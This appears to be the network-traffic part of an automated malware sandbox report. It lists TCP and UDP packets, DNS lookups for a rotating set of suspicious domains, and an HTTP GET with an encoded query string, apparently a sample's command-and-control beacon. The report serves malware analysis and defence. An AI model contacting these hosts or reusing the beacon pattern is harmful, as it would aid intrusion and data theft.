                                                                  Oct 7, 2024 10:40:19.224251986 CEST5000180192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:19.550646067 CEST8050001203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:19.930846930 CEST5000280192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:19.935879946 CEST8050002203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:19.936031103 CEST5000280192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:19.947967052 CEST5000280192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:19.952989101 CEST8050002203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:20.994896889 CEST8050001203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:20.995152950 CEST5000180192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:21.459216118 CEST5000280192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:21.464540005 CEST8050002203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:21.464603901 CEST5000280192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:22.479039907 CEST5000380192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:22.484287024 CEST8050003203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:22.484879017 CEST5000380192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:22.496325016 CEST5000380192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:22.501324892 CEST8050003203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:22.501385927 CEST8050003203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:24.005624056 CEST5000380192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:24.010896921 CEST8050003203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:24.010974884 CEST5000380192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:25.027048111 CEST5000480192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:25.032298088 CEST8050004203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:25.032501936 CEST5000480192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:25.039671898 CEST5000480192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:25.044608116 CEST8050004203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:26.444962978 CEST8050004203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:26.456265926 CEST8050004203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:26.456377029 CEST8050004203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:26.456468105 CEST5000480192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:26.456468105 CEST5000480192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:26.460866928 CEST5000480192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:26.466017962 CEST8050004203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:31.677025080 CEST5000580192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:31.682246923 CEST805000538.47.233.65192.168.2.10
                                                                  Oct 7, 2024 10:40:31.682385921 CEST5000580192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:31.763179064 CEST5000580192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:31.768595934 CEST805000538.47.233.65192.168.2.10
                                                                  Oct 7, 2024 10:40:32.606268883 CEST805000538.47.233.65192.168.2.10
                                                                  Oct 7, 2024 10:40:32.606396914 CEST805000538.47.233.65192.168.2.10
                                                                  Oct 7, 2024 10:40:32.606530905 CEST5000580192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:33.271262884 CEST5000580192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:34.431168079 CEST5000680192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:34.436085939 CEST805000638.47.233.65192.168.2.10
                                                                  Oct 7, 2024 10:40:34.436317921 CEST5000680192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:34.450180054 CEST5000680192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:34.455123901 CEST805000638.47.233.65192.168.2.10
                                                                  Oct 7, 2024 10:40:35.344913006 CEST805000638.47.233.65192.168.2.10
                                                                  Oct 7, 2024 10:40:35.345015049 CEST805000638.47.233.65192.168.2.10
                                                                  Oct 7, 2024 10:40:35.345060110 CEST5000680192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:35.958817959 CEST5000680192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:37.030030966 CEST5000780192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:37.035099030 CEST805000738.47.233.65192.168.2.10
                                                                  Oct 7, 2024 10:40:37.035339117 CEST5000780192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:37.078308105 CEST5000780192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:37.084549904 CEST805000738.47.233.65192.168.2.10
                                                                  Oct 7, 2024 10:40:37.085025072 CEST805000738.47.233.65192.168.2.10
                                                                  Oct 7, 2024 10:40:37.913081884 CEST805000738.47.233.65192.168.2.10
                                                                  Oct 7, 2024 10:40:37.913101912 CEST805000738.47.233.65192.168.2.10
                                                                  Oct 7, 2024 10:40:37.913353920 CEST5000780192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:38.586338043 CEST5000780192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:39.603703022 CEST5000880192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:39.608707905 CEST805000838.47.233.65192.168.2.10
                                                                  Oct 7, 2024 10:40:39.608836889 CEST5000880192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:39.618515015 CEST5000880192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:39.623373985 CEST805000838.47.233.65192.168.2.10
                                                                  Oct 7, 2024 10:40:40.523669958 CEST805000838.47.233.65192.168.2.10
                                                                  Oct 7, 2024 10:40:40.524197102 CEST805000838.47.233.65192.168.2.10
                                                                  Oct 7, 2024 10:40:40.524384975 CEST5000880192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:40.527045012 CEST5000880192.168.2.1038.47.233.65
                                                                  Oct 7, 2024 10:40:40.531960011 CEST805000838.47.233.65192.168.2.10
                                                                  Oct 7, 2024 10:40:45.557315111 CEST5000980192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:40:45.562253952 CEST8050009172.81.61.224192.168.2.10
                                                                  Oct 7, 2024 10:40:45.562364101 CEST5000980192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:40:45.573451996 CEST5000980192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:40:45.578372002 CEST8050009172.81.61.224192.168.2.10
                                                                  Oct 7, 2024 10:40:47.083972931 CEST5000980192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:40:47.130604982 CEST8050009172.81.61.224192.168.2.10
                                                                  Oct 7, 2024 10:40:48.102421999 CEST5001080192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:40:48.107435942 CEST8050010172.81.61.224192.168.2.10
                                                                  Oct 7, 2024 10:40:48.107513905 CEST5001080192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:40:48.117775917 CEST5001080192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:40:48.122641087 CEST8050010172.81.61.224192.168.2.10
                                                                  Oct 7, 2024 10:40:49.630666971 CEST5001080192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:40:49.682645082 CEST8050010172.81.61.224192.168.2.10
                                                                  Oct 7, 2024 10:40:50.650517941 CEST5001180192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:40:50.657421112 CEST8050011172.81.61.224192.168.2.10
                                                                  Oct 7, 2024 10:40:50.658540964 CEST5001180192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:40:50.670505047 CEST5001180192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:40:50.677144051 CEST8050011172.81.61.224192.168.2.10
                                                                  Oct 7, 2024 10:40:50.678132057 CEST8050011172.81.61.224192.168.2.10
                                                                  Oct 7, 2024 10:40:52.177647114 CEST5001180192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:40:52.226664066 CEST8050011172.81.61.224192.168.2.10
                                                                  Oct 7, 2024 10:40:53.198641062 CEST5001280192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:40:53.203712940 CEST8050012172.81.61.224192.168.2.10
                                                                  Oct 7, 2024 10:40:53.206682920 CEST5001280192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:40:53.214644909 CEST5001280192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:40:53.219527006 CEST8050012172.81.61.224192.168.2.10
                                                                  Oct 7, 2024 10:41:06.950490952 CEST8050009172.81.61.224192.168.2.10
                                                                  Oct 7, 2024 10:41:06.952497005 CEST5000980192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:41:09.565793991 CEST8050010172.81.61.224192.168.2.10
                                                                  Oct 7, 2024 10:41:09.565855026 CEST5001080192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:41:12.026967049 CEST8050011172.81.61.224192.168.2.10
                                                                  Oct 7, 2024 10:41:12.027040958 CEST5001180192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:41:14.588747978 CEST8050012172.81.61.224192.168.2.10
                                                                  Oct 7, 2024 10:41:14.589097977 CEST5001280192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:41:14.591944933 CEST5001280192.168.2.10172.81.61.224
                                                                  Oct 7, 2024 10:41:14.596752882 CEST8050012172.81.61.224192.168.2.10
                                                                  Oct 7, 2024 10:41:19.705723047 CEST5001380192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:19.710769892 CEST8050013194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:19.710860014 CEST5001380192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:19.722125053 CEST5001380192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:19.727160931 CEST8050013194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:20.404263973 CEST8050013194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:20.404309988 CEST8050013194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:20.404362917 CEST8050013194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:20.404393911 CEST8050013194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:20.404427052 CEST8050013194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:20.404454947 CEST5001380192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:20.404509068 CEST5001380192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:20.404509068 CEST5001380192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:21.228408098 CEST5001380192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:22.243851900 CEST5001480192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:22.249324083 CEST8050014194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:22.249443054 CEST5001480192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:22.261383057 CEST5001480192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:22.266629934 CEST8050014194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:22.943185091 CEST8050014194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:22.943214893 CEST8050014194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:22.943233967 CEST8050014194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:22.943254948 CEST8050014194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:22.943274975 CEST8050014194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:22.943301916 CEST5001480192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:22.943380117 CEST5001480192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:23.771428108 CEST5001480192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:24.790791035 CEST5001580192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:24.795859098 CEST8050015194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:24.796030045 CEST5001580192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:24.806813002 CEST5001580192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:24.811841011 CEST8050015194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:24.811881065 CEST8050015194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:25.484146118 CEST8050015194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:25.484174013 CEST8050015194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:25.484194040 CEST8050015194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:25.484206915 CEST8050015194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:25.484225988 CEST8050015194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:25.484236956 CEST5001580192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:25.484301090 CEST5001580192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:25.484301090 CEST5001580192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:26.318372965 CEST5001580192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:27.338071108 CEST5001680192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:27.343497992 CEST8050016194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:27.343589067 CEST5001680192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:27.351933002 CEST5001680192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:27.356897116 CEST8050016194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:28.052274942 CEST8050016194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:28.052321911 CEST8050016194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:28.052339077 CEST8050016194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:28.052428961 CEST5001680192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:28.052436113 CEST8050016194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:28.052453995 CEST8050016194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:28.052474976 CEST5001680192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:28.052587986 CEST8050016194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:28.052604914 CEST8050016194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:28.052622080 CEST8050016194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:28.052627087 CEST5001680192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:28.052659035 CEST5001680192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:28.052768946 CEST8050016194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:28.052784920 CEST8050016194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:28.052817106 CEST5001680192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:28.052975893 CEST8050016194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:28.053019047 CEST5001680192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:28.057252884 CEST5001680192.168.2.10194.58.112.174
                                                                  Oct 7, 2024 10:41:28.062093019 CEST8050016194.58.112.174192.168.2.10
                                                                  Oct 7, 2024 10:41:35.256429911 CEST5001780192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:41:35.261781931 CEST80500173.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:41:35.262969017 CEST5001780192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:41:35.274629116 CEST5001780192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:41:35.279563904 CEST80500173.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:41:36.640373945 CEST80500173.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:41:36.640485048 CEST5001780192.168.2.103.33.130.190

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 7, 2024 10:38:23.484716892 CEST5897953192.168.2.101.1.1.1
                                                                  Oct 7, 2024 10:38:23.561732054 CEST53589791.1.1.1192.168.2.10
                                                                  Oct 7, 2024 10:38:39.086910009 CEST5938153192.168.2.101.1.1.1
                                                                  Oct 7, 2024 10:38:39.567441940 CEST53593811.1.1.1192.168.2.10
                                                                  Oct 7, 2024 10:38:53.478163958 CEST5097353192.168.2.101.1.1.1
                                                                  Oct 7, 2024 10:38:53.642930984 CEST53509731.1.1.1192.168.2.10
                                                                  Oct 7, 2024 10:39:07.321397066 CEST5788553192.168.2.101.1.1.1
                                                                  Oct 7, 2024 10:39:08.318022013 CEST5788553192.168.2.101.1.1.1
                                                                  Oct 7, 2024 10:39:09.160825968 CEST53578851.1.1.1192.168.2.10
                                                                  Oct 7, 2024 10:39:09.160868883 CEST53578851.1.1.1192.168.2.10
                                                                  Oct 7, 2024 10:39:22.805779934 CEST4974753192.168.2.101.1.1.1
                                                                  Oct 7, 2024 10:39:22.877511024 CEST53497471.1.1.1192.168.2.10
                                                                  Oct 7, 2024 10:39:36.213494062 CEST5185853192.168.2.101.1.1.1
                                                                  Oct 7, 2024 10:39:36.222902060 CEST53518581.1.1.1192.168.2.10
                                                                  Oct 7, 2024 10:39:44.290858984 CEST5096553192.168.2.101.1.1.1
                                                                  Oct 7, 2024 10:39:44.408519030 CEST53509651.1.1.1192.168.2.10
                                                                  Oct 7, 2024 10:39:57.843025923 CEST6035053192.168.2.101.1.1.1
                                                                  Oct 7, 2024 10:39:57.865551949 CEST53603501.1.1.1192.168.2.10
                                                                  Oct 7, 2024 10:40:14.009208918 CEST5051153192.168.2.101.1.1.1
                                                                  Oct 7, 2024 10:40:15.021295071 CEST5051153192.168.2.101.1.1.1
                                                                  Oct 7, 2024 10:40:16.021285057 CEST5051153192.168.2.101.1.1.1
                                                                  Oct 7, 2024 10:40:17.377651930 CEST53505111.1.1.1192.168.2.10
                                                                  Oct 7, 2024 10:40:17.377692938 CEST53505111.1.1.1192.168.2.10
                                                                  Oct 7, 2024 10:40:17.377722025 CEST53505111.1.1.1192.168.2.10
                                                                  Oct 7, 2024 10:40:31.480042934 CEST4958453192.168.2.101.1.1.1
                                                                  Oct 7, 2024 10:40:31.659238100 CEST53495841.1.1.1192.168.2.10
                                                                  Oct 7, 2024 10:40:45.543139935 CEST6417153192.168.2.101.1.1.1
                                                                  Oct 7, 2024 10:40:45.554860115 CEST53641711.1.1.1192.168.2.10
                                                                  Oct 7, 2024 10:41:19.603477955 CEST5173853192.168.2.101.1.1.1
                                                                  Oct 7, 2024 10:41:19.702756882 CEST53517381.1.1.1192.168.2.10
                                                                  Oct 7, 2024 10:41:34.946935892 CEST5139253192.168.2.101.1.1.1
                                                                  Oct 7, 2024 10:41:35.253551006 CEST53513921.1.1.1192.168.2.10

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Oct 7, 2024 10:38:23.484716892 CEST192.168.2.101.1.1.10xff3eStandard query (0)www.wearenotgoingback.infoA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:38:39.086910009 CEST192.168.2.101.1.1.10xfc96Standard query (0)www.030002304.xyzA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:38:53.478163958 CEST192.168.2.101.1.1.10x236dStandard query (0)www.kilbmn.xyzA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:39:07.321397066 CEST192.168.2.101.1.1.10xa9beStandard query (0)www.galaxyslot88rtp.latA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:39:08.318022013 CEST192.168.2.101.1.1.10xa9beStandard query (0)www.galaxyslot88rtp.latA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:39:22.805779934 CEST192.168.2.101.1.1.10xf9f7Standard query (0)www.chalet-tofane.netA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:39:36.213494062 CEST192.168.2.101.1.1.10x4d04Standard query (0)www.kfowks.siteA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:39:44.290858984 CEST192.168.2.101.1.1.10xcb6dStandard query (0)www.federall.storeA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:39:57.843025923 CEST192.168.2.101.1.1.10xd82bStandard query (0)www.mivasectomy.netA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:40:14.009208918 CEST192.168.2.101.1.1.10x26c7Standard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:40:15.021295071 CEST192.168.2.101.1.1.10x26c7Standard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:40:16.021285057 CEST192.168.2.101.1.1.10x26c7Standard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:40:31.480042934 CEST192.168.2.101.1.1.10x8146Standard query (0)www.nng65.topA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:40:45.543139935 CEST192.168.2.101.1.1.10x8c4dStandard query (0)www.moritynomxd.xyzA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:41:19.603477955 CEST192.168.2.101.1.1.10x216cStandard query (0)www.albero-dveri.onlineA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:41:34.946935892 CEST192.168.2.101.1.1.10x4fbeStandard query (0)www.platinumkitchens.infoA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Oct 7, 2024 10:38:23.561732054 CEST1.1.1.1192.168.2.100xff3eNo error (0)www.wearenotgoingback.infowearenotgoingback.infoCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 7, 2024 10:38:23.561732054 CEST1.1.1.1192.168.2.100xff3eNo error (0)wearenotgoingback.info76.223.105.230A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:38:23.561732054 CEST1.1.1.1192.168.2.100xff3eNo error (0)wearenotgoingback.info13.248.243.5A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:38:39.567441940 CEST1.1.1.1192.168.2.100xfc96No error (0)www.030002304.xyz030002304.xyzCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 7, 2024 10:38:39.567441940 CEST1.1.1.1192.168.2.100xfc96No error (0)030002304.xyz65.21.196.90A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:38:53.642930984 CEST1.1.1.1192.168.2.100x236dNo error (0)www.kilbmn.xyz162.0.238.246A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:39:09.160825968 CEST1.1.1.1192.168.2.100xa9beNo error (0)www.galaxyslot88rtp.latgalaxyslot88rtp.latCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 7, 2024 10:39:09.160825968 CEST1.1.1.1192.168.2.100xa9beNo error (0)galaxyslot88rtp.lat46.17.172.49A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:39:09.160868883 CEST1.1.1.1192.168.2.100xa9beNo error (0)www.galaxyslot88rtp.latgalaxyslot88rtp.latCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 7, 2024 10:39:09.160868883 CEST1.1.1.1192.168.2.100xa9beNo error (0)galaxyslot88rtp.lat46.17.172.49A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:39:22.877511024 CEST1.1.1.1192.168.2.100xf9f7No error (0)www.chalet-tofane.netchalet-tofane.netCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 7, 2024 10:39:22.877511024 CEST1.1.1.1192.168.2.100xf9f7No error (0)chalet-tofane.net62.149.128.40A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:39:36.222902060 CEST1.1.1.1192.168.2.100x4d04Name error (3)www.kfowks.sitenonenoneA (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:39:44.408519030 CEST1.1.1.1192.168.2.100xcb6dNo error (0)www.federall.store45.130.41.13A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:39:57.865551949 CEST1.1.1.1192.168.2.100xd82bNo error (0)www.mivasectomy.netmivasectomy.netCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 7, 2024 10:39:57.865551949 CEST1.1.1.1192.168.2.100xd82bNo error (0)mivasectomy.net3.33.130.190A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:39:57.865551949 CEST1.1.1.1192.168.2.100xd82bNo error (0)mivasectomy.net15.197.148.33A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:40:17.377651930 CEST1.1.1.1192.168.2.100x26c7No error (0)www.animekuid.xyzanimekuid.xyzCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 7, 2024 10:40:17.377651930 CEST1.1.1.1192.168.2.100x26c7No error (0)animekuid.xyz203.175.9.128A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:40:17.377692938 CEST1.1.1.1192.168.2.100x26c7No error (0)www.animekuid.xyzanimekuid.xyzCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 7, 2024 10:40:17.377692938 CEST1.1.1.1192.168.2.100x26c7No error (0)animekuid.xyz203.175.9.128A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:40:17.377722025 CEST1.1.1.1192.168.2.100x26c7No error (0)www.animekuid.xyzanimekuid.xyzCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 7, 2024 10:40:17.377722025 CEST1.1.1.1192.168.2.100x26c7No error (0)animekuid.xyz203.175.9.128A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:40:31.659238100 CEST1.1.1.1192.168.2.100x8146No error (0)www.nng65.topnng65.topCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 7, 2024 10:40:31.659238100 CEST1.1.1.1192.168.2.100x8146No error (0)nng65.top38.47.233.65A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:40:45.554860115 CEST1.1.1.1192.168.2.100x8c4dNo error (0)www.moritynomxd.xyz172.81.61.224A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:41:19.702756882 CEST1.1.1.1192.168.2.100x216cNo error (0)www.albero-dveri.online194.58.112.174A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:41:35.253551006 CEST1.1.1.1192.168.2.100x4fbeNo error (0)www.platinumkitchens.infoplatinumkitchens.infoCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 7, 2024 10:41:35.253551006 CEST1.1.1.1192.168.2.100x4fbeNo error (0)platinumkitchens.info3.33.130.190A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 10:41:35.253551006 CEST1.1.1.1192.168.2.100x4fbeNo error (0)platinumkitchens.info15.197.148.33A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • www.wearenotgoingback.info
                                                                  • www.030002304.xyz
                                                                  • www.kilbmn.xyz
                                                                  • www.galaxyslot88rtp.lat
                                                                  • www.chalet-tofane.net
                                                                  • www.federall.store
                                                                  • www.mivasectomy.net
                                                                  • www.animekuid.xyz
                                                                  • www.nng65.top
                                                                  • www.moritynomxd.xyz
                                                                  • www.albero-dveri.online
                                                                  • www.platinumkitchens.info

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.104997676.223.105.230806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:38:23.582180977 CEST525OUTGET /cjvv/?EZ2lo=4S8XY8l3MvvMOMyL3KrDz8kPPAGqnGng5tYYPWDdvWcwX33CgHNrDDjfFme/uWZ2yYnPkPJRTtnUR7GmwOpWBkY/43NiHjgDg3aX97mZZ8znKIfN0Q==&7NP=7FXXUPl HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.wearenotgoingback.info
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:38:24.034672976 CEST467INHTTP/1.1 301 Moved Permanently
                                                                  location: https://wearenotgoingback.info/cjvv/?EZ2lo=4S8XY8l3MvvMOMyL3KrDz8kPPAGqnGng5tYYPWDdvWcwX33CgHNrDDjfFme/uWZ2yYnPkPJRTtnUR7GmwOpWBkY/43NiHjgDg3aX97mZZ8znKIfN0Q==&7NP=7FXXUPl
                                                                  vary: Accept-Encoding
                                                                  server: DPS/2.0.0+sha-227ca78
                                                                  x-version: 227ca78
                                                                  x-siteid: us-east-1
                                                                  set-cookie: dps_site_id=us-east-1; path=/
                                                                  date: Mon, 07 Oct 2024 08:38:23 GMT
                                                                  keep-alive: timeout=5
                                                                  transfer-encoding: chunked
                                                                  connection: close
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0
